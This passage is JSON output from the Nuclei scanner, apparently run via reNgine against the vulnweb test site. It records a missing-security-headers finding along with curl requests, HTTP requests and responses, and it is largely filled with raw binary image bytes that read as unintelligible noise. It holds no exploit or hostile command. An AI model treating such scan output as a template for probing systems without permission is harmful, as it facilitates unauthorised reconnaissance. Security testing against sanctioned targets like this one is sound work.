d8]\\ufffda\\u0019\\u0004\\ufffd\\ufffd\\u0000\\u001fQ[SU\\ufffd\\ufffd\\ufffd\\u001c\\u0014\\ufffdћ\\\\Tp\\\\.\\u0017j\\ufffdV\\ufffd\\ufffd\\ufffd!\\u000b\\u0012\\ufffdQcUe-\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdP\\u0000;\\ufffd\\ufffd\\ufffd\\ufffdE4d\\ufffd)h\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd \\u0012\\u0001ǶH\\ufffd\\ufffduk}ɵ-.\\ufffd\\ufffd\\ufffd\\ufffdgO\\ufffd\\ufffd7;G\\ufffd\\ufffd\\ufffd-ӿs\\ufffdN\\ufffdVDA\\u0019ld\\ufffdJ\\ufffd2\\u0000$\\u0003\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffd7U.\\ufffdY%\\ufffd\\ufffdZ%\\ufffd\\ufffd\\ufffd\\ufffd\\ufffde\\ufffd\\u0003~\\u003eV%X\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\ufffd\\u0018%z\\ufffdWM;F\\ufffdv\\u001f\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdé\\ufffd\\ufffd\\ufffd\\ufffd}?UCp\\ufffd[\\ufffdvj\\ufffdTn\\ufffd\\ufffd~\\ufffdɂ\\ufffdF1\\ufffd\\ufffd\\ufffd\\ufffdO,t\\ufffd\\ufffdq\\ufffd\\u0008\\ufffd\\ufffdϏ\\ufffdT\\ufffd\\ufffdm\\ufffd\\ufffd8;\\ufffd\\ufffd+A\\ufffdKUl\\ufffdW$\\ufffd{c\\ufffd;\\ufffd\\ufffdȩj'W\\u0006\\u0005A\\ufffd\\u001bҪIS\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\rc\\u0015\\u0015\\ufffd_\\ufffd\\ufffd\\ufffdqV\\u001d\\ufffdaI6\\u0000\\u000e\\ufffd\\ufffd]\\ufffd\\r\\ufffdU\\ufffd\\ufffd\\ufffd\\n\\ufffd[WY]h\\ufffdJ\\ufffd\\ufffdm\\ufffd\\ufffdWYd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd(\\ufffd\\ufffdQ\\u0013v\\ufffd\\ufffd@_\\ufffdQ\\ufffd\\ufffds\\ufffdܱ\\ufffd\\ufffd5\\ufffd\\ufffdA\\u0007b\\ufffd\\ufffd9h\\ufffd+$\\ufffdUWA\\ufffdHm\\ufffdGX\\ufffd\\u0003\\u0003f\\ufffdƒ\\ufffd\\ufffdY%\\ufffd\\ufffd\\ufffd\\ufffd.'\\u0019=3\\ufffd\\ufffd\\ufffd\\u0015E\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdA\\ufffdx^E\\ufffd\\ufffd\\ufffd@'\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u001af\\u001bF\\ufffd\\ufffd6\\ufffd\\ufffd@\\ufffd\\u003c\\ufffd\\\",c\\ufffd\\ufffdJ)c\\ufffd!|\\u000c\\ufffdg\\ufffd\\u0001\\ufffd\\ufffd\\ufffd%\\ufffd\\u000f\\ufffd\\ufffdm!xo\\ufffd\\u0000\\ufffd\\\\\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffd\\u003cU\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\r\\ufffd\\ufffdOG\\u0019\\ufffdD\\ufffd3\\ufffdF|\\ufffdi\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\r\\u001fv\\ufffd\\ufffdX;\\ufffd\\ufffdh{\\ufffd\\ufffd\\ufffd\\\\\\u0005]\\ufffdrJ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffd;!\\ufffd\\ufffd\\\"\\ufffdv\\ufffdz\\ufffdV+\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffdV\\ufffd\\ufffd\\ufffdxRV=Ѝ\\ufffd\\u0004\\ufffd\\ufffdD\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\u0015$\\ufffdM\\ufffd\\ufffd:\\u0003\\ufffdT\\ufffd\\ufffd\\ufffdۜ\\ufffd\\ufffd[;\\ufffd\\u0010IfR\\ufffdN\\u000b\\u001e[\\ufffd\\u0006p\\u003ch\\ufffd)\\ufffd#Ս\\u000fo|\\ufffd\\u0010e:\\ufffd|\\ufffd\\u0011\\ufffd\\ufffdc\\ufffd\\ufffd\\u0010\\ufffd}\\ufffduf\\ufffd\\u000cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-Mgj\\u0026bx\\u0003?MA\\ufffd\\ufffde\\u000c$\\ufffdH$\\u001c4r.\\ufffdS\\ufffdy\\u0007\\ufffd\\u001f\\ufffd\\ufffdt\\ufffd\\u0007\\ufffd:\\ufffdc\\ufffdyo\\u0018\\u001a\\u0005\\\"\\ufffd\\ufffd\\u001b\\ufffd\\ufffd5c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\u000e\\u000f\\ufffd\\ufffdЕ\\\\\\ufffdT\\ufffd\\ufffd[N\\ufffd\\ufffd;\\ufffd\\ufffd*\\ufffdi\\ufffd\\ufffdU\\ufffd\\u0000e\\ufffd$c \\ufffdyʰP\\ufffd\\ufffd[\\u00168\\ufffd\\ufffd\\u0014\\u0014o\\ufffd\\u003c=\\u0013\\ufffdSG\\u001f\\u000c\\ufffd3\\ufffd\\u0002|ꅪ袞W\\ufffd\\ufffdZр\\ufffd;\\ufffd\\u001e\\u0018{6\\u003ed?\\ufffd\\u0006\\u001b\\ufffd\\ufffd\\ufffd\\ufffd}_\\ufffd\\ufffdY\\u001fn\\ufffdR\\ufffdH\\u0003,sQwx`\\u0000;\\u001dH \\ufffd\\u0018\\ufffd\\ufffd\\u0004{\\u001d\\u0015^\\ufffdn\\ufffd\\ufffd\\ufffdvJ\\ufffd=\\u001a\\u001b\\ufffdD\\ufffd\\ufffd2mٖ*@E\\u0001\\ufffd*\\u000cP\\u0007\\ufffdF2F\\ufffdnW8\\ufffd\\u000c' \\ufffdd\\u001d\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdo\\u0017Q\\ufffd[t\\u000f\\ufffdj\\ufffd\\ufffd\\ufffde\\u0013R\\ufffdOGN\\ufffdݎ\\ufffd\\u0011\\u001231J\\ufffd!US\\ufffd2\\u0008\\ufffd\\ufffdr\\t'ZM\\ufffd\\ufffdYx\\ufffd\\ufffdd\\u0011\\ufffd\\ufffdW\\ufffdY\\ufffd*e_F\\u0019\\u0015\\ufffd\\ufffdh\\ufffd\\ufffdK\\u0002\\ufffd\\ufffd\\ufffdIпº\\ufffdT\\r;\\ufffdf\\ufffd\\ufffd\\ufffdQ+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd;{{\\ufffd\\u0000g\\ufffd\\u00060\\ufffdc\\ufffdt۽eB[n]\\ufffdI\\ufffd\\ufffdPc\\u000b\\u0018\\u0007\\u0001pp\\u000f\\ufffd\\u00089\\ufffd\\ufffd\\ufffd\\ufffd\\u0005d\\ufffd\\u0013?\\ufffd\\ufffd\\u0001\\ufffd\\ufffds\\ufffd\\ufffd׿\\ufffd4T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|J\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\u0015\\ufffd6\\ufffd\\ufffd\\ufffdi\\u0016)\\ufffd\\ufffd\\ufffd\\u0001e\\ufffd\\ufffdrB\\ufffd\\u0007\\ufffd\\ufffd\\u000c\\u0002\\u00179\\u0004\\u0003\\ufffdz:\\ufffd\\ufffd\\ufffdG/e@\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffdj\\ufffd\\ufffd=\\u00038P?P\\ufffd\\ufffd\\u003e\\u0017\\u001bpwj\\ufffd\\ufffd\\u0015l7\\u001b\\u001d\\ufffd\\u000b\\ufffd(\\ufffd\\ufffd\\u0011\\u0011hX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:39.224572709Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ 